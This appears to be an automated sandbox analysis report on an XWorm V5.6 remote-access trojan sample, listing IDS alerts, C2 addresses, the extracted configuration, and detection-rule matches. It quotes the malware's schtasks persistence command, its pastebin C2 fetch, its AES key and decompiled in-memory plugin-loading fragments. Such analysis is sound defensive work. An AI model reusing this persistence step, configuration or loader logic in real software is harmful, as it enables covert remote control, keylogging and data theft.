2025-01-03T14:08:54.931644+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:55.858233+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:58.258236+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:01.138062+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:01.225686+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:01.322255+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:06.478780+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:11.330253+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:13.344413+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:13.440256+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:20.233278+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:21.484371+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:21.580271+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:25.403642+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:27.339604+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:27.344416+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:37.388404+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:37.704422+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:38.304303+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:47.197312+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:47.558589+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:52.650949+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:52.946369+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:53.039248+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:53.044482+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:09:53.263432+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:02.591056+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:03.050258+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:03.143437+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:13.203880+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:13.323976+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:13.417056+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:22.666304+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:24.612694+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:34.713528+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:34.811492+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:34.904303+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:34.997326+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:35.091153+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:45.121619+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:45.218478+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:45.311654+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:45.405751+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:50.828802+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:50.921759+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:51.015010+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:51.107738+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:55.248291+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:10:59.337165+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:11:00.871460+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T14:07:26.053811+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:07:55.943481+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:25.963366+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:08:55.981477+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:25.944410+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:09:55.941742+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:25.942800+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:55.942781+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              2025-01-03T14:10:56.325098+010028528741Malware Command and Control Activity Detected87.120.125.477000192.168.2.449731TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T14:08:19.131552+010028531931Malware Command and Control Activity Detected192.168.2.44973187.120.125.477000TCP

              AV Detection

              Source: XClient.exe | Avira: detected
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Avira: detection malicious, Label: TR/Spy.Gen
              Source: XClient.exe | Malware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/c8qJf1m5"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
              Source: C:\Users\user\AppData\Roaming\XClient.exe | ReversingLabs: Detection: 73%
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Virustotal: Detection: 68%
              Source: XClient.exe | ReversingLabs: Detection: 73%
              Source: XClient.exe | Virustotal: Detection: 68%
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Joe Sandbox ML: detected
              Source: XClient.exe | Joe Sandbox ML: detected
              Source: XClient.exe | String decryptor: https://pastebin.com/raw/c8qJf1m5
              Source: XClient.exe | String decryptor: <123456789>
              Source: XClient.exe | String decryptor: <Xwormmm>
              Source: XClient.exe | String decryptor: XWorm V5.6
              Source: XClient.exe | String decryptor: USB.exe
              Source: XClient.exe | String decryptor: %AppData%
              Source: XClient.exe | String decryptor: XClient.exe
              Source: XClient.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: XClient.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49731 -> 87.120.125.47:7000
              Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.125.47:7000 -> 192.168.2.4:49731
              Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49731 -> 87.120.125.47:7000
              Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 87.120.125.47:7000 -> 192.168.2.4:49731
              Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49731 -> 87.120.125.47:7000
              Source: Malware configuration extractor | URLs: https://pastebin.com/raw/c8qJf1m5
              Source: unknown | DNS query: name: pastebin.com
              Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 87.120.125.47:7000
              Source: global traffic | HTTP traffic detected: GET /raw/c8qJf1m5 HTTP/1.1  Host: pastebin.com  Connection: Keep-Alive
              Source: Joe Sandbox View | IP Address: 172.67.19.24
              Source: Joe Sandbox View | ASN Name: UNACS-AS-BG8000BurgasBG
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknown | TCP traffic detected without corresponding DNS query: 87.120.125.47
              Source: global traffic | DNS traffic detected: DNS query: pastebin.com
              Source: XClient.exe, 00000000.00000002.4114219369.0000000002581000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: XClient.exe, 0000000A.00000002.3557691921.0000000002631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/c8qJf1m5
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49730 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: XClient.exe, XLogger.cs | .Net Code: KeyboardLayout
              Source: XClient.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout
              Source: C:\Users\user\Desktop\XClient.exe | Window created: window name: CLIPBRDWNDCLASS

              System Summary

              Source: XClient.exe, type: SAMPLE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
              Source: XClient.exe, type: SAMPLE | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 0.0.XClient.exe.210000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
              Source: 0.0.XClient.exe.210000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
              Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: C:\Users\user\Desktop\XClient.exe | Process Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\XClient.exe | Code function: 0_2_00007FFD9B88A312
              Source: C:\Users\user\Desktop\XClient.exe | Code function: 0_2_00007FFD9B88CDF4
              Source: C:\Users\user\Desktop\XClient.exe | Code function: 0_2_00007FFD9B889566
              Source: C:\Users\user\Desktop\XClient.exe | Code function: 0_2_00007FFD9B8805B8
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Code function: 3_2_00007FFD9B8B0C5E
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Code function: 7_2_00007FFD9B890C5E
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Code function: 9_2_00007FFD9B8B0C5E
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Code function: 10_2_00007FFD9B8A0C5E
              Source: XClient.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: XClient.exe, type: SAMPLE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: XClient.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.0.XClient.exe.210000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: 0.0.XClient.exe.210000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: XClient.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe, Settings.cs | Base64 encoded string: 'ZlD002faNX/VP8ZhkqGXGsdkCkVxk0o/fndQ1CBZ/1mwdtfiAOqqPiDC7p60Ppli', 'T6WVOL3r5tFWPRdyqM02J6v5zc+c8ThmALUekuoVCmskM7E9HuB2ltVG/MtLaVwD', 'M82l2dzmQkcd3ImjFHBM1mL1b+pEkXJRMKTEYK0m0GnJExl+4lrlbS5JIWqWxle7', 'm3HjZ4Cb5qRguCifeAFlU8qxLDI8upw0JU2uLuL8ay/Xu0ptaRRmcgZj1myg/cow'
              Source: XClient.exe.0.dr, Settings.cs | Base64 encoded string: 'ZlD002faNX/VP8ZhkqGXGsdkCkVxk0o/fndQ1CBZ/1mwdtfiAOqqPiDC7p60Ppli', 'T6WVOL3r5tFWPRdyqM02J6v5zc+c8ThmALUekuoVCmskM7E9HuB2ltVG/MtLaVwD', 'M82l2dzmQkcd3ImjFHBM1mL1b+pEkXJRMKTEYK0m0GnJExl+4lrlbS5JIWqWxle7', 'm3HjZ4Cb5qRguCifeAFlU8qxLDI8upw0JU2uLuL8ay/Xu0ptaRRmcgZj1myg/cow'
              Source: XClient.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: XClient.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: XClient.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: XClient.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@8/3@1/2
              Source: C:\Users\user\Desktop\XClient.exe | File created: C:\Users\user\AppData\Roaming\XClient.exe
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Mutant created: NULL
              Source: C:\Users\user\Desktop\XClient.exe | Mutant created: \Sessions\1\BaseNamedObjects\lEEsdQo4zb5soE9b
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
              Source: XClient.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: XClient.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\XClient.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\XClient.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: XClient.exe | ReversingLabs: Detection: 73%
              Source: XClient.exe | Virustotal: Detection: 68%
              Source: C:\Users\user\Desktop\XClient.exe | File read: C:\Users\user\Desktop\XClient.exe
              Source: unknown | Process created: C:\Users\user\Desktop\XClient.exe "C:\Users\user\Desktop\XClient.exe"
              Source: C:\Users\user\Desktop\XClient.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
              Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\XClient.exe C:\Users\user\AppData\Roaming\XClient.exe
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: edputil.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: appresolver.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: bcp47langs.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: slc.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: sppc.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: sxs.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: scrrun.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: linkinfo.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: ntshrui.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: cscapi.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: rasapi32.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: rasman.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: rtutils.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: secur32.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: textinputframework.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: coreuicomponents.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: avicap32.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: msvfw32.dll
              Source: C:\Users\user\Desktop\XClient.exe | Section loaded: winmm.dll
              Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Section loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\XClient.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\XClient.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
              Source: XClient.lnk.0.dr | LNK file: ..\..\..\..\..\XClient.exe
              Source: XClient.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: XClient.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

Source: XClient.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: XClient.exe, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: XClient.exe, Messages.cs .Net Code: Memory
Source: XClient.exe.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: XClient.exe.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: XClient.exe.0.dr, Messages.cs .Net Code: Memory
Source: C:\Users\user\Desktop\XClient.exe Code function: 0_2_00007FFD9B8806A8 push ebx; retf 0_2_00007FFD9B8806EA
Source: C:\Users\user\Desktop\XClient.exe Code function: 0_2_00007FFD9B8805FA push ebx; retf 0_2_00007FFD9B88060A
Source: C:\Users\user\Desktop\XClient.exe Code function: 0_2_00007FFD9B8805F8 push ebx; retf 0_2_00007FFD9B88060A
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 3_2_00007FFD9B8B0604 push ebx; retf 3_2_00007FFD9B8B060A
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 3_2_00007FFD9B8B06D8 push ebx; retf 3_2_00007FFD9B8B06EA
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 7_2_00007FFD9B8905FA push ebx; retf 7_2_00007FFD9B89060A
